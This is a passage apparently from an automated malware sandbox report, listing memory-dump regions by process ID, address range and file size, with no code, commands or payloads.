                                                                                                                                  432KB

                                                                                                                                • memory/1224-86-0x00000227C12C0000-0x00000227C12EA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/1224-87-0x00007FFC48250000-0x00007FFC48260000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/1244-89-0x000001A4BE9C0000-0x000001A4BE9EA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/1244-90-0x00007FFC48250000-0x00007FFC48260000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/1300-801-0x0000000000FB0000-0x000000000101C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/1316-1538-0x0000000000130000-0x000000000019C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/1332-536-0x00000000007B0000-0x000000000081C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/1340-98-0x00007FFC48250000-0x00007FFC48260000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/1340-97-0x00000222524B0000-0x00000222524DA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/1380-101-0x00007FFC48250000-0x00007FFC48260000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/1380-100-0x000002A443790000-0x000002A4437BA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/1392-103-0x00000149CBD40000-0x00000149CBD6A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/1504-1348-0x0000000000250000-0x00000000002BC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/1588-1210-0x00000000004D0000-0x000000000053C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/1664-46-0x0000000140000000-0x0000000140040000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  256KB

                                                                                                                                • memory/1664-44-0x00007FFC87150000-0x00007FFC8720D000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  756KB

                                                                                                                                • memory/1664-42-0x0000000140000000-0x0000000140040000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  256KB

                                                                                                                                • memory/1664-41-0x0000000140000000-0x0000000140040000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  256KB

                                                                                                                                • memory/1664-43-0x00007FFC881D0000-0x00007FFC883C8000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/1704-1277-0x0000000000E80000-0x0000000000EEC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/1824-395-0x0000000000D80000-0x0000000000DEC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/1832-1603-0x0000000000090000-0x00000000000FC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/1876-1571-0x0000000000D80000-0x0000000000DEC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/2108-1381-0x0000000000F30000-0x0000000000F9C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/2164-1315-0x0000000000B70000-0x0000000000BDC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/2332-1009-0x0000000000BA0000-0x0000000000C0C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/2348-871-0x0000000000AD0000-0x0000000000B3C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/2468-1638-0x0000000000560000-0x00000000005CC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/2520-700-0x0000000000040000-0x00000000000AC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/2648-39-0x00007FFC881D0000-0x00007FFC883C8000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/2648-45-0x0000020575370000-0x0000020575382000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  72KB

                                                                                                                                • memory/2648-37-0x000002055AD70000-0x000002055ADAE000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  248KB

                                                                                                                                • memory/2648-36-0x000002055A9A0000-0x000002055A9EE000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  312KB

                                                                                                                                • memory/2648-40-0x00007FFC87150000-0x00007FFC8720D000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  756KB

                                                                                                                                • memory/2912-445-0x0000000000680000-0x00000000006EC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/2956-597-0x0000000000AE0000-0x0000000000B4C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/2968-771-0x0000000000ED0000-0x0000000000F3C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/3188-1699-0x00000000008A0000-0x000000000090C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/3492-1075-0x0000000000C80000-0x0000000000CEC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4000-1144-0x0000000000330000-0x000000000039C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4012-1413-0x0000000000D70000-0x0000000000DDC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4024-1043-0x00000000004E0000-0x000000000054C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4208-837-0x0000000000A30000-0x0000000000A9C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4312-907-0x0000000000D20000-0x0000000000D8C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4372-1178-0x0000000000B50000-0x0000000000BBC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4652-973-0x00000000001C0000-0x000000000022C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4696-1445-0x0000000000B00000-0x0000000000B6C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4760-382-0x0000019E00000000-0x0000019E00528000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  5.2MB

                                                                                                                                • memory/4760-632-0x0000000000C80000-0x0000000000CEC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/4896-1477-0x0000000000530000-0x000000000059C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/5032-739-0x0000000000D10000-0x0000000000D7C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  432KB

                                                                                                                                • memory/5052-15-0x00007FFC69E50000-0x00007FFC6A912000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/5052-16-0x00007FFC69E50000-0x00007FFC6A912000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/5052-2-0x000001DC2CEA0000-0x000001DC2CEC2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  136KB

                                                                                                                                • memory/5052-19-0x00007FFC69E50000-0x00007FFC6A912000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/5052-12-0x00007FFC69E50000-0x00007FFC6A912000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/5052-14-0x00007FFC69E50000-0x00007FFC6A912000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB

                                                                                                                                • memory/5052-13-0x00007FFC69E50000-0x00007FFC6A912000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  10.8MB